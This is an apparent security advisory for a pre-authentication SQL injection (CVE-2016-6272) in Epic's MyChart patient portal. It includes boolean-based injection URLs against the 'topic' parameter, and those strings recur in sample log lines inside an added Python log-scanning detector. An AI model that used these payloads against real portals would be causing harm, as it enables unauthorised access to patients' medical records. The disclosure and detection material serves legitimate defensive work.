EPIC MyChart SQL Injection

2018.02.17
Credit: Shayan S
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Epic Systems Corporation MyChart SQL Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
# Vendor Homepage: https://www.epic.com/software
# Software Link: N/A
# Version: N/A
# Tested on: Windows/Unix
# CVE : CVE-2016-6272

Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."

The MyChart software uses InterSystems Caché for its DBMS and contains a pre-authentication SQL injection caused by the lack of sanitization of the GET parameter "topic".

EPIC was quick to respond to contact and patch the vulnerability in MyChart.

Below are two proofs of concept:

Proof of concept 1:

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=7900 AND ("LygB"="LygB ===> TRUE (this will show the help topic for enabling cookies)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB ===> FALSE (will not show)

Proof of concept 2 (operations):

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*8 OR "000OxPf"="000OxPf ===> TRUE

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 OR "000OxPf"="000OxPf ===> TRUE (because of the OR)

https://server/mychart/help.asp?topic=COMPONENT^COOKIEENABLE" AND 2*3*8=6*6 AND"000OxPf"="000OxPf ===> FALSE
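
A defender-side check for the request pattern described above, as an added example that is not part of the original advisory or of Epic's code: it scans web access logs for help.asp requests whose "topic" value falls outside the shape of the benign value shown in the proofs of concept. The allowlist pattern (inferred from that single value), the Common Log Format layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate topic ids look like the one benign value in the
# advisory ("COMPONENT^COOKIEENABLE"): upper-case tokens joined by "^".
TOPIC_OK = re.compile(r"[A-Z0-9_]+(?:\^[A-Z0-9_]+)*")

# Request field of a Common Log Format line. The non-greedy target plus the
# trailing status code copes with raw (unencoded) quotes and spaces in the URL.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+" \d{3}')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Aug/2016:10:00:01 +0000] "GET /mychart/help.asp'
    '?topic=COMPONENT%5ECOOKIEENABLE HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Aug/2016:10:00:07 +0000] "GET /mychart/help.asp'
    '?topic=COMPONENT%5ECOOKIEENABLE%22%20AND%207900%3D7900%20AND%20'
    '(%22LygB%22%3D%22LygB HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/Aug/2016:10:00:09 +0000] "GET /mychart/help.asp'
    '?TOPIC=COMPONENT^COOKIEENABLE" AND 7900=8000 AND ("LygB"="LygB'
    ' HTTP/1.1" 200 312',
    '192.0.2.10 - - [19/Aug/2016:10:00:12 +0000] "GET /other/page.asp'
    '?topic=a%22b HTTP/1.1" 200 100',
]


def suspicious_topics(lines, page="/help.asp"):
    """Return (client_ip, decoded_topic) for requests to `page` whose topic
    value does not match the allowlist pattern."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(page):
            continue
        # parse_qsl percent-decodes; ASP treats parameter names
        # case-insensitively, so "TOPIC=" must be inspected too.
        for name, value in parse_qsl(url.query):
            if name.lower() == "topic" and not TOPIC_OK.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, topic in suspicious_topics(SAMPLE_LOG):
        print(f"{ip}\t{topic!r}")
```

The same allowlist pattern can be applied as server-side input validation in front of the page, in addition to parameterizing the query itself.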

